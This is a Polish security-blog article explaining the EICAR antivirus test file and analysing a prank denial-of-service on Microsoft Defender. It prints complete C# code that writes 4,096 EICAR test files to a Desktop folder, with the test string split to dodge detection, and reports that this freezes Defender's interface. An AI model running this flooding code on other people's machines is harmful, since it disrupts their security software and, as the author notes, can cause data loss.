ethical.blue Magazine

// Cybersecurity clarified.

Program antywirusowy Microsoft Defender zalany (ang. flooded) próbkami EICAR

19.07.2022   Dawid Farbaniec
...
Plik Eicar to nieszkodliwy program typu .com dla systemu MS-DOS. Służy do testów działania oprogramowania antywirusowego. Skrót EICAR oznacza European Institute for Computer Anti-Virus Research. Instytut ten to organizacja pracująca nad rozwojem technik wykrywania i zwalczania nie tylko wirusów komputerowych, ale ogólnie pojętego złośliwego oprogramowania. To właśnie w tym instytucie zrodził się pomysł stworzenia pliku, który będzie rozpoznawany jako wirus komputerowy, ale nie będzie wykonywał żadnych szkodliwych działań. Uznano, że plik tego rodzaju będzie bardzo pomocny przy testowaniu oprogramowania antywirusowego. Za pomocą tego małego pliku każdy użytkownik może sprawdzić działanie zainstalowanego antywirusa.

Plik Eicar jest programem typu .com dla systemu MS-DOS. Jego rozmiar to 68 bajtów. W celu zmniejszenia możliwości użycia tego pliku w złośliwym celu wprowadzono limit ograniczający ilość bajtów do maksymalnie 128.

Wyobraź sobie, że bez tego ograniczenia dopisujesz plik testowy EICAR (68 bajtów) do legalnego, nieszkodliwego oprogramowania, a antywirus je usuwa z powodu wykrycia kodu EICAR.

Nie wyklucza to jednak niewłaściwego lub złośliwego użycia pliku testowego EICAR.

Ten tekst zawiera analizę małego ataku typu odmowa usługi (ang. Denial of Service) na program antywirusowy Microsoft Defender.

Eksperyment polegał na napisaniu programu (na przykład w C#.NET), który tworzyłby wiele plików testowych EICAR w określonym katalogu na pulpicie.

Wyrzutnia EICARów w C#.NET

Poniżej przedstawiono kod programu dla tego eksperymentu.

// See https://aka.ms/new-console-template for more information

string payload = @"X5O!P%@AP[4\PZX54(P^)7CC)7}$" +
    "EICAR-STANDARD-ANT" + (char)0x49 +
    "VIRUS-TEST-FILE!$H+H*";

string path = Path.Combine(
    Environment.GetFolderPath(
    Environment.SpecialFolder.Desktop),
    Guid.NewGuid().ToString().Replace("-", "0"));

if (Directory.Exists(path) == false)
{
    Directory.CreateDirectory(path);
}

for(int i = 0; i < 4096; i++)
{
    File.WriteAllText(Path.Combine(path, $"{i}.com"), payload);
}

Console.WriteLine("ethical.blue");

Ta aplikacja konsolowa C# próbuje utworzyć 4096 plików testowych EICAR w folderze umieszczonym na pulpicie.

Wykonanie tego kodu spowoduje niewielki atak typu Denial of Service na program antywirusowy Microsoft Defender. Poniższy film pokazuje, że interfejs graficzny oprogramowania antywirusowego nie odpowiada.



Prawdopodobnie użytkownik musi poczekać, aż Microsoft Defender przestanie migać, a będzie migał około 4096 razy.

Można sklasyfikować ten program jako żart komputerowy. Żarty komputerowe związane są ze sceną VX i lekcjami informatyki w szkołach. Niektóre dowcipy są nieszkodliwe i naprawdę zabawne. Inne mogą być destrukcyjne lub bardzo irytujące.

Zwróć uwagę, że zalany próbkami (ang. flooded) program antywirusowy Microsoft Defender może spowodować utratę danych lub inne szkody.

Sprawdź lokalne prawo i pozostań etyczny. Za zakłócanie pracy systemów informatycznych można zostać ukaranym!

Wykaz literatury

https://www.eicar.org/download-anti-malware-testfile/ [access: 2022-07-19]